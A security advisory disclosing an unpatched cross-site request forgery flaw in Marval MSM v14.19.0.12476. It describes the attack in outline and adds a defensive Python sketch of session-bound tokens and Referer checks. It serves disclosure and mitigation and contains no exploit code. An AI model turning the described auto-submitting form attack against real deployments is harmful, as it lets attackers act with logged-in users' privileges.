Vendor: MSM
By: Momen Eldawakhly (Cyber Guy)
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: MSM
Affected Version From: v14.19.0.12476
Affected Version To: v14.19.0.12476
Patch Exists: NO
Related CWE:
CPE: MSM
Platforms Tested: Windows
2022
Marval MSM v14.19.0.12476 – Cross-Site Request Forgery (CSRF)
Marval MSM v14.19.0.12476 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page that contains a form with an action pointing to the vulnerable application. When a logged-in user visits the malicious page, the form will be automatically submitted, allowing the attacker to perform actions with the same privileges as the user.
Mitigation:
Implementing a CSRF token in the application can help mitigate this vulnerability. The application should also validate the HTTP Referer header to ensure that the request comes from a trusted source.
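The two checks named in the mitigation, sketched server-side as an added example (framework-neutral Python, not Marval's code). The host `msm.example.test`, the form field `csrf_token`, and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)                # per-deployment secret
TRUSTED_SOURCES = {("https", "msm.example.test")}   # hypothetical deployment host
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
NONCE_LEN = 32                                      # hex characters in the nonce

def _mac(session_id: str, nonce: str) -> str:
    # Fixed-length nonce first, so the nonce/session boundary is unambiguous.
    msg = f"{nonce}|{session_id}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_token(session_id: str) -> str:
    """Return a token bound to one session, to embed in each form."""
    nonce = secrets.token_hex(NONCE_LEN // 2)
    return f"{nonce}.{_mac(session_id, nonce)}"

def token_ok(session_id: str, token) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = (token or "").partition(".")
    if not sep or len(nonce) != NONCE_LEN:
        return False
    expected = _mac(session_id, nonce)
    return hmac.compare_digest(mac.encode(), expected.encode())

def referer_ok(headers: dict) -> bool:
    """Exact scheme+host match; a substring or prefix test would accept
    look-alike hosts such as msm.example.test.attacker.example."""
    try:
        parts = urlsplit(headers.get("Referer", ""))
    except ValueError:
        return False
    return (parts.scheme, parts.hostname) in TRUSTED_SOURCES

def allow_request(method, headers, session_id, form) -> bool:
    """Gate for state-changing requests: both checks must pass."""
    if method.upper() in SAFE_METHODS:
        return True
    return referer_ok(headers) and token_ok(session_id, form.get("csrf_token"))
```

A request with no Referer header is rejected here; deployments behind privacy proxies that strip the header need to decide that case explicitly rather than defaulting to allow.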